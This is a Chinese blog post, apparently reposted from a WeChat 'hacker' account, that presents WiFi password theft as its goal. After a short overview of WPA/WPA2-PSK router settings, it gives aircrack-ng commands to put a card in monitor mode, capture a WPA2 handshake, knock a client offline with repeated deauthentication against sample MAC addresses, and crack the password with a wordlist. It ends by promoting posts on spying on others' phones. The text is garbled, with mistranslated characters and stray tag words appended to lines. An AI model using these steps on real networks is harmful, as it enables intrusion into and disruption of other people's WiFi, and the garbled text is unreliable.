牛掰了,用最樸素的方法WiFi無線滲透,偷密碼

掌控安全學院-kkkk投稿web

WPA/WPA2:算法


WPA/WPA2是一種比WEP強壯的加密算法,挑選這種安全類型,路由器將選用Radius服務器進行身份認證並獲得密鑰的WPA或WPA2安全形式。安全


由於要架起一臺專用的認證服務器,價值對比貴重且保護也很雜亂,因此不推薦不一樣用戶運用此安全類型。服務器


WPA-PSK/WPA2-PSK:微信


WPA-PSK/WPA2-PSK安全類型實際上是WPA/WPA2的一種簡化版本,它是依據同享密鑰的WPA形式,安全性很高,設置也相對簡單,適合不一樣家庭用戶和小型企業運用。app

其詳細設置:工具

認證類型:該項用來挑選體系選用的安全形式,即主動、WPA-PSK、WPA2-PSK。學習

主動:若挑選該項,路由器會依據主機懇求主動挑選WPA-PSK或WPA-PSK的安全形式。flex

加密算法:該項用來挑選對無線數據進行加密的安全算法,選項有主動、TKIP、AES。默許選項爲主動,挑選該項後,路由器將依據實踐需求主動挑選TKIP或AES加密辦法。留意11N形式不支持TKIP算法。網站

PSK暗碼:該項就是WPA-PSK/WPA2-PSK的初始密鑰了,在設置是,需求爲8-63個ASCII字符或者8-64個十六進制的字符。

組密鑰更新週期:該項設置播送和組博密鑰的定時更新,以秒爲單位,最小值爲30,若該值爲0,問表示不進行更新。

使用Aircrack-ng抓取WPA2-PSK握手包

主要步驟:

1.設置無線網卡至監聽模式 airmon-ng start wlan0

2.掃描周圍WPA2-PSK加密的無線信號 airodump-ng wlan0mon

3.新建一個終端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道

4.等待過程當中,發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包:

aireplay-ng -0 5 -a BSSID -c STATION wlan0mon設置爲發起5次攻擊

若是想要不停的發起攻擊就是這樣aireplay-ng -0 0 -a BSSID -c STATION wlan0mon

開始操做



我使用的網卡是TL-WN722N

此時須要讓虛擬機鏈接網卡

鏈接成功後,輸入ifconfig會看到

而後輸入airmon-ng start wlan0

成功後

開始監聽(掃描周圍的無線信號)

途中CN爲信道

airodump-ng -c 信道 --bssid xxx -w 保存路徑 wlan0mon

抓取目標的握手包

參數:—ivs -w FAN 保存ivs格式的包,名字爲test —bssid 要破解ap的ssid

強制將客戶端踢下線aireplay-ng -0 0 -a 目標的MAC地址 -c 目標客戶端MAC wlan0mon

aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon

開始進行攻擊,可是有時候該命令會報錯。這是由於網卡會隨機使用信道,信道不一樣,多嘗試幾回一樣的命令直到成功就好了

如圖所示就證實抓到了握手包

開始破解密碼,執行

最後用好的字典爆破

以下的命令,成功後就能夠看到已經破解出的密碼,若是密碼複雜一點,可能須要時間

aircrack-ng -w 字典 保存的包

aircrack-ng -w 後面都是絕對路徑



學習更多黑客技體驗靶場實戰練習

黑客視頻資料及工具


往期內容回顧


滲透某賭博網站殺豬盤的經歷!

手把手教你如何遠程監聽他人手機

黑客網站大全!都在這了!速看被刪就沒了







本文分享自微信公衆號 - 暗網黑客(HackRead)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索